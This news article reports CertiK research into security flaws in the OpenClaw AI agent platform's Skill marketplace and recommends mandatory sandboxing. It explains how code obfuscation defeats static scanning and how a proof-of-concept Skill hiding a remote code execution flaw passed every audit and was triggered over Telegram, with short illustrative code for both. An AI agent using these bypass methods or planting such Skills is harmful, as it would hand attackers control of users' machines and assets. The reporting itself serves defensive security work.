Is Your "OpenClaw" Running Naked? CertiK Tests Show How a Vulnerable OpenClaw Skill Bypasses Audits and Takes Over Computers Without Authorization

marsbit · Published 2026-03-17 · Updated 2026-03-17

Summary

OpenClaw, a popular open-source, self-hosted AI agent platform, has experienced rapid growth due to its flexibility and extensibility. Its ecosystem relies heavily on third-party “Skills” from the Clawhub marketplace, which can perform high-risk operations like system automation and crypto wallet transactions. However, security firm CertiK has identified critical vulnerabilities in the platform’s security model. CertiK’s research reveals that OpenClaw’s current security—primarily dependent on pre-publishing scans like VirusTotal, static code analysis, and AI logic checks—is fundamentally flawed. These measures can be easily bypassed through simple code obfuscation, and malicious Skills can be published even before scanning is complete. In a proof-of-concept, CertiK developed a seemingly benign Skill that contained a hidden remote code execution vulnerability. It passed all checks without warnings and, once installed, allowed full system control via a remote command. The core issue is not a specific bug but an industry-wide misconception: over-reliance on scanning instead of runtime isolation. Unlike systems like iOS, which enforce strict sandboxing, OpenClaw’s sandbox is optional and often disabled for functionality, leaving systems exposed. CertiK recommends that OpenClaw enforce mandatory sandboxing and granular permission controls for Skills. Users are advised to deploy OpenClaw on isolated devices and avoid exposing sensitive data or assets until stronger isolation is implemented.

Recently, the open-source self-hosted AI agent platform OpenClaw (colloquially known as "小龙虾" or "Little Crayfish") has rapidly gained popularity thanks to its flexibility, extensibility, and self-controlled deployment, becoming a phenomenon in the personal AI agent space. Its core ecosystem, Clawhub, serves as an app marketplace, gathering a vast number of third-party Skill plugins that let agents unlock advanced capabilities with one click—from web search and content creation to crypto wallet operations, on-chain interactions, and system automation—driving explosive growth in both ecosystem scale and user base.

But for these third-party Skills running in high-privilege environments, where exactly are the platform's true security boundaries?

Recently, CertiK, the world's largest Web3 security company, released new research on Skill security. The report points out that the current market has a misperception of the security boundaries of AI agent ecosystems: the industry generally treats "Skill scanning" as the core security boundary, but this mechanism is almost useless against hacker attacks.

If OpenClaw is compared to an operating system for smart devices, Skills are the various apps installed on the system. Unlike ordinary consumer-grade apps, some Skills in OpenClaw run in high-privilege environments, directly accessing local files, calling system tools, connecting to external services, executing host environment commands, and even operating users' crypto assets. Once security issues arise, they can directly lead to serious consequences such as sensitive information leakage, remote device takeover, and theft of digital assets.

The current universal security solution for third-party Skills across the industry is "pre-listing scanning and auditing." OpenClaw's Clawhub has also built a three-layer audit protection system: integrating VirusTotal code scanning, static code detection engines, and AI logic consistency checks, pushing security alerts to users through risk classification in an attempt to safeguard ecosystem security. However, CertiK's research and proof-of-concept attack tests confirm that this detection system has shortcomings in real attack and defense scenarios and cannot bear the core responsibility of security protection.

The research first breaks down the inherent limitations of the existing detection mechanisms:

Static detection rules are easily bypassed. The core of this engine relies on matching code features to identify risks, such as flagging the combination of "reading sensitive environmental information + sending network requests" as high-risk behavior. However, attackers only need to make slight syntactic modifications to the code to completely bypass feature matching while fully retaining malicious logic, akin to rephrasing dangerous content in synonymous terms, rendering the security scanner completely ineffective.
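The bypass described above can be sketched in a few lines. The rule and its patterns below are illustrative assumptions, not Clawhub's actual detection engine: a feature-matching rule flags the combination of "read sensitive environment data + send network request," and a trivially obfuscated variant with identical behavior slips past it.

```python
import re

# Hypothetical sketch of a feature-matching static rule (not Clawhub's actual
# engine): flag code that both reads sensitive environment variables AND makes
# a network request.
RISK_PATTERNS = [
    r"os\.environ",           # reads sensitive environment data
    r"requests\.(get|post)",  # sends a network request
]

def naive_scan(source: str) -> bool:
    """Return True when every risk pattern matches, i.e. the combo is flagged."""
    return all(re.search(p, source) for p in RISK_PATTERNS)

# Direct version: the scanner flags it.
direct = "import os, requests\nrequests.post(url, data=os.environ['API_KEY'])"

# Trivially obfuscated version: identical behavior at runtime, but the literal
# feature strings never appear in the source, so pattern matching finds nothing.
obfuscated = (
    "import os, requests\n"
    "env = getattr(os, 'env' + 'iron')\n"
    "send = getattr(requests, 'po' + 'st')\n"
    "send(url, data=env['API_KEY'])"
)

print(naive_scan(direct))      # flagged
print(naive_scan(obfuscated))  # slips through unchanged in behavior
```

Real engines use richer rules than this toy, but the asymmetry is the same: the attacker only has to evade the specific features being matched, while the defender has to enumerate every possible spelling of the same behavior.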

AI auditing has inherent detection blind spots. The core positioning of Clawhub's AI audit is a "logic consistency detector," which can only catch obvious malicious code where "declared functionality does not match actual behavior," but is helpless against exploitable vulnerabilities hidden within normal business logic, much like how it's difficult to find fatal traps buried deep in the clauses of a seemingly compliant contract.

More critically, the audit process has underlying design flaws: even when VirusTotal scan results are still in a "pending" state, Skills that have not completed the full "health check" process can be directly listed publicly, and users can install them without any warnings, leaving an opening for attackers.
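The listing flaw amounts to fail-open gating. A minimal sketch, with state names assumed for illustration: publication only checks that no scanner has returned "malicious" yet, so a Skill whose scan is still "pending" goes live, whereas fail-closed gating would withhold it until every check completes clean.

```python
# Hypothetical sketch of the audit-process flaw; the field and state names
# ("scan_status", "pending", "clean") are assumptions for illustration.

def can_list_flawed(skill: dict) -> bool:
    # Fail-open: listing proceeds as long as nothing has come back "malicious",
    # so a Skill still awaiting its VirusTotal verdict is published anyway.
    return skill["scan_status"] != "malicious"

def can_list_strict(skill: dict) -> bool:
    # Fail-closed: a Skill is listed only after the scan completes and is clean.
    return skill["scan_status"] == "clean"

pending = {"name": "test-web-searcher", "scan_status": "pending"}
print(can_list_flawed(pending))  # listed before the scan finishes
print(can_list_strict(pending))  # withheld until the scan is clean
```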

To verify the real-world harm of this risk, the CertiK research team carried out a full test. The team developed a Skill named "test-web-searcher," which superficially appears to be a fully compliant web search tool whose code follows standard development practices, but which actually implants a remote code execution vulnerability within the normal functional flow.

This Skill bypassed both the static engine and the AI audit, and was installed normally, without any security warnings, while the VirusTotal scan was still pending. Finally, by remotely sending an instruction via Telegram, the team triggered the vulnerability and achieved arbitrary command execution on the host device (in the demo, it made the system launch the calculator).
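The pattern at work can be illustrated with a deliberately simplified sketch. The function names, URL, and payload below are hypothetical, not the actual "test-web-searcher" code, and nothing dangerous is executed here: a helper that looks like routine search plumbing splices raw input into a shell string, so a remote instruction breaks out of the quotes and becomes host commands.

```python
import shlex

# Illustrative sketch only: how an exploitable flaw hides inside ordinary
# business logic. Names and the URL are hypothetical, not the PoC's real code,
# and the commands are never executed, only constructed.

def build_search_command(query: str) -> str:
    # Looks like a routine helper preparing a curl call for a search API.
    # An AI "logic consistency" check sees declared behavior (web search)
    # matching actual behavior. But the raw query is spliced into a shell
    # string, so a remotely delivered payload such as
    # "x'; open -a Calculator; echo '" escapes the quotes and runs
    # arbitrary commands if this string reaches a shell.
    return f"curl -s 'https://example.com/search?q={query}'"

def build_search_command_safe(query: str) -> str:
    # Quoting attacker-controlled input (or better, passing argv lists with
    # no shell at all) keeps metacharacters inert.
    return "curl -s " + shlex.quote("https://example.com/search?q=" + query)

payload = "x'; open -a Calculator; echo '"
print(build_search_command(payload))       # injected command escapes the quotes
print(build_search_command_safe(payload))  # payload stays a harmless literal
```

Parsing the two strings shows the difference: the unsafe command splits into extra shell tokens carrying the injected command, while the safe one keeps the entire query as a single argument.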

CertiK clearly stated in the research that these issues are not product bugs unique to OpenClaw, but rather a common cognitive error across the entire AI agent industry: the industry generally treats "audit scanning" as the core security defense line while neglecting the true security foundation, namely mandatory runtime isolation and fine-grained permission control. This is just like how the security core of Apple's iOS ecosystem has never been the strict review of the App Store, but rather the system's mandatory sandbox mechanism and fine-grained permission control, which allows each app to run only in its dedicated isolation compartment, unable to arbitrarily obtain system permissions. However, OpenClaw's existing sandbox mechanism is optional rather than mandatory and relies heavily on manual user configuration. The vast majority of users, to ensure Skill functionality and availability, choose to disable the sandbox, ultimately leaving the agent "running naked." Once a Skill with vulnerabilities or malicious code is installed, it can directly lead to catastrophic consequences.
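The deny-by-default model the research argues for can be sketched as a manifest-plus-gate design, loosely analogous to iOS entitlements. The manifest format and permission names below are assumptions for illustration, not OpenClaw's actual API: a Skill declares what it needs, the runtime grants only the intersection with what it is willing to grant at all, and high-risk capabilities are simply never grantable.

```python
from dataclasses import dataclass, field

# Minimal sketch of deny-by-default permissioning; the manifest format and
# permission names ("net.fetch", "shell.exec", ...) are illustrative
# assumptions, not OpenClaw's real API.

@dataclass
class SkillManifest:
    name: str
    # Capabilities a Skill must declare up front; anything undeclared is denied.
    permissions: set = field(default_factory=set)

class PermissionDenied(Exception):
    pass

class Sandbox:
    # Capabilities the runtime is willing to grant at all. High-risk ones
    # (shell execution, wallet keys) simply never appear here.
    GRANTABLE = {"net.fetch", "fs.read.workdir"}

    def __init__(self, manifest: SkillManifest):
        # Grant only the intersection: declared AND grantable.
        self.granted = manifest.permissions & self.GRANTABLE

    def require(self, permission: str) -> None:
        # Every privileged operation must pass through this gate.
        if permission not in self.granted:
            raise PermissionDenied(f"{permission} not granted")

sandbox = Sandbox(SkillManifest("web-searcher", {"net.fetch", "shell.exec"}))
sandbox.require("net.fetch")       # declared and grantable: allowed
try:
    sandbox.require("shell.exec")  # declared, but never grantable: denied
except PermissionDenied as e:
    print(e)
```

The point of the design is that compromise is contained rather than prevented: even if a malicious Skill sails through every scan, the worst it can do is bounded by the capabilities the runtime was ever willing to grant.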

Regarding the issues discovered, CertiK also provided security guidance:

● For developers of AI agents like OpenClaw, sandbox isolation must be made the default, mandatory configuration for third-party Skills, paired with a fine-grained permission control model, never allowing third-party code to inherit the host machine's high privileges by default.

● For ordinary users, a "Safe" label in the Skill marketplace merely indicates that no risks were detected, not that the Skill is absolutely safe. Until strong underlying isolation mechanisms officially ship as the default configuration, it is recommended to deploy OpenClaw on non-critical idle devices or virtual machines, and never let it near sensitive files, password credentials, or high-value crypto assets.

The AI agent sector is currently on the eve of an explosion, and the speed of ecosystem expansion must not outpace the pace of security construction. Audit scanning can only block basic malicious attacks and can never serve as the security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "assuming risk exists and containing damage," and by mandating isolation boundaries at the lowest layer of the runtime, can the security bottom line of AI agents truly be upheld, allowing this technological transformation to proceed steadily and go the distance.

Related Questions

Q: What is the main security vulnerability identified by CertiK in the OpenClaw platform's Skill ecosystem?

A: The main vulnerability is the industry's misplaced reliance on pre-upload "scanning and auditing" as the core security boundary. This system is easily bypassed, and the platform lacks a mandatory, default sandbox isolation and fine-grained permission control model for third-party Skills, leaving high-privilege environments exposed.

Q: How did CertiK's proof-of-concept Skill, "test-web-searcher", demonstrate the security flaw?

A: The "test-web-searcher" Skill, which appeared to be a compliant web search tool, contained a hidden remote code execution vulnerability. It bypassed all static and AI auditing checks, was installed without any security warnings, and was triggered via a remote Telegram command to execute arbitrary code on the host machine (e.g., launching the system calculator).

Q: What are the two key limitations of OpenClaw's current three-layer audit protection system (Clawhub) as outlined in the research?

A: 1. Static detection rules can be easily bypassed through minor syntactic changes that preserve the malicious logic. 2. The AI audit has a fundamental blind spot: it can only detect a mismatch between declared and actual functionality, and is ineffective against vulnerabilities hidden within normal business logic.

Q: What core security principle does CertiK recommend that OpenClaw and similar AI agent platforms adopt, drawing a comparison to Apple's iOS?

A: CertiK recommends adopting a mandatory sandbox isolation mechanism and a fine-grained permission control model as the default for third-party Skills. This is analogous to the iOS security model, where apps run in an enforced sandbox and are strictly permission-controlled, rather than relying primarily on App Store review.

Q: What practical safety advice does the article give to ordinary users of OpenClaw until stronger security measures are implemented?

A: Users are advised not to trust the "Safe" label on Skills, as it only means no risks were detected, not that a Skill is absolutely safe. They should deploy OpenClaw on non-critical, idle devices or within a virtual machine, keeping it away from sensitive files, password credentials, and high-value crypto assets.

